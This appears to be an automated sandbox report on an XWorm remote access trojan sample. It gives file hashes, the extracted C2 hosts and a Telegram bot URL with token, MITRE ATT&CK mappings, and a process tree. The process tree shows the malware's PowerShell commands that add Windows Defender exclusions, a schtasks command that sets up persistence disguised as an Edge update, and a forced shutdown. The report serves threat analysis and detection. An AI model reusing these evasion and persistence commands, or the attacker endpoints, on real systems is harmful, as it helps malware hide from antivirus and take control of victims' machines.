xworm | 3706d906a279ab466f5c526dea3e804ce378ac164fcdc49a1184190669f8f934

Reason

Machine shutdown

General

Target

erteterteret.exe
Size

177KB
MD5

858162036ca676172602e7f20396294d
SHA1

98a1816c6f93aad44e89bbd40ffc5be75528fff6
SHA256

3706d906a279ab466f5c526dea3e804ce378ac164fcdc49a1184190669f8f934
SHA512

9206535c14c4a2c61d06f5e52ffc513663c73c00d4ac2dae7f9f0f038a503e091e8a003d794674df2b23f8d23f3e7ecba956c3d24a77babc73cd83cda2b114c4
SSDEEP

3072:W9vmZA2wRabTfnm/KOYqPtBz65/M6If+3Js+3JFkKeTn6:W9gdw0bzmMExBt25

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

C2

email-champions.gl.at.ply.gg:33429

took-chance.gl.at.ply.gg:33429

Attributes

Install_directory
%AppData%
install_file
MsBusDriver.exe
telegram
https://api.telegram.org/bot6814850214:AAGtrnkhUh3vMq-wH7W5cvNuSWLdcy7mtis/sendMessage?chat_id=7094837950

Signatures

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2420-1-0x00000000010E0000-0x0000000001112000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302	family_xworm
behavioral1/memory/2064-35-0x0000000001380000-0x00000000013B2000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2724 powershell.exe
2656 powershell.exe
2660 powershell.exe
2832 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

MicrosoftEdgeUpdate937498302

pid process

2064 MicrosoftEdgeUpdate937498302
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2696 schtasks.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeerteterteret.exe

pid process

2832 powershell.exe
2724 powershell.exe
2656 powershell.exe
2660 powershell.exe
2420 erteterteret.exe

pid	process
2724	powershell.exe
2656	powershell.exe
2660	powershell.exe
2832	powershell.exe

pid	process
2064	MicrosoftEdgeUpdate937498302

flow	ioc
4	ip-api.com

pid	process
2696	schtasks.exe

pid	process
2832	powershell.exe
2724	powershell.exe
2656	powershell.exe
2660	powershell.exe
2420	erteterteret.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

erteterteret.exepowershell.exepowershell.exepowershell.exepowershell.exeMicrosoftEdgeUpdate937498302shutdown.exe

description	pid	process
Token: SeDebugPrivilege	2420	erteterteret.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	2420	erteterteret.exe
Token: SeDebugPrivilege	2064	MicrosoftEdgeUpdate937498302
Token: SeShutdownPrivilege	264	shutdown.exe
Token: SeRemoteShutdownPrivilege	264	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

erteterteret.exe

pid process

2420 erteterteret.exe

pid	process
2420	erteterteret.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

erteterteret.exetaskeng.exe

description	pid	process	target process
PID 2420 wrote to memory of 2832	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2832	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2832	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2724	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2724	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2724	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2656	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2656	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2656	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2660	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2660	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2660	2420	erteterteret.exe	powershell.exe
PID 2420 wrote to memory of 2696	2420	erteterteret.exe	schtasks.exe
PID 2420 wrote to memory of 2696	2420	erteterteret.exe	schtasks.exe
PID 2420 wrote to memory of 2696	2420	erteterteret.exe	schtasks.exe
PID 2940 wrote to memory of 2064	2940	taskeng.exe	MicrosoftEdgeUpdate937498302
PID 2940 wrote to memory of 2064	2940	taskeng.exe	MicrosoftEdgeUpdate937498302
PID 2940 wrote to memory of 2064	2940	taskeng.exe	MicrosoftEdgeUpdate937498302
PID 2420 wrote to memory of 264	2420	erteterteret.exe	shutdown.exe
PID 2420 wrote to memory of 264	2420	erteterteret.exe	shutdown.exe
PID 2420 wrote to memory of 264	2420	erteterteret.exe	shutdown.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\erteterteret.exe
"C:\Users\Admin\AppData\Local\Temp\erteterteret.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\erteterteret.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'erteterteret.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeUpdate937498302'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2660
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdate937498302" /tr "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2696
- C:\Windows\system32\shutdown.exe
  shutdown.exe /f /s /t 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:264

C:\Windows\system32\taskeng.exe
taskeng.exe {1B70FE36-EB6A-409D-8DF9-061169FD39F2} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2940
- C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302
  C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2064

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:404

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdate937498302

Filesize
177KB

MD5
858162036ca676172602e7f20396294d

SHA1
98a1816c6f93aad44e89bbd40ffc5be75528fff6

SHA256
3706d906a279ab466f5c526dea3e804ce378ac164fcdc49a1184190669f8f934

SHA512
9206535c14c4a2c61d06f5e52ffc513663c73c00d4ac2dae7f9f0f038a503e091e8a003d794674df2b23f8d23f3e7ecba956c3d24a77babc73cd83cda2b114c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7NQDGD5UKEMQDY30VH8B.temp

Filesize
7KB

MD5
7dea417b199161c5e642b23534b9a7a3

SHA1
59e1cddb00f5d409f24fac8f1eb9ece5afedc022

SHA256
336bfa041bf539249fbd8d3b5a9e47b9a1c0b9b2fe2109e6393eea7ce795a0c4

SHA512
2649abc3f3293c50717a1a3b19be84a1fedd3cae70613cf0575782b76b2896a53dd8b60a814e8f70274443b9ab63aa5eb1e411f7ccbf29e7478e21031fbb52dd

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2064-35-0x0000000001380000-0x00000000013B2000-memory.dmp

Filesize
200KB

Download
memory/2420-30-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-1-0x00000000010E0000-0x0000000001112000-memory.dmp

Filesize
200KB

Download
memory/2420-2-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-36-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp

Filesize
9.9MB

Download
memory/2420-31-0x0000000000C80000-0x0000000000C8C000-memory.dmp

Filesize
48KB

Download
memory/2420-0-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp

Filesize
4KB

Download
memory/2420-28-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp

Filesize
4KB

Download
memory/2724-16-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2724-15-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2832-9-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2832-8-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2832-7-0x0000000002930000-0x00000000029B0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads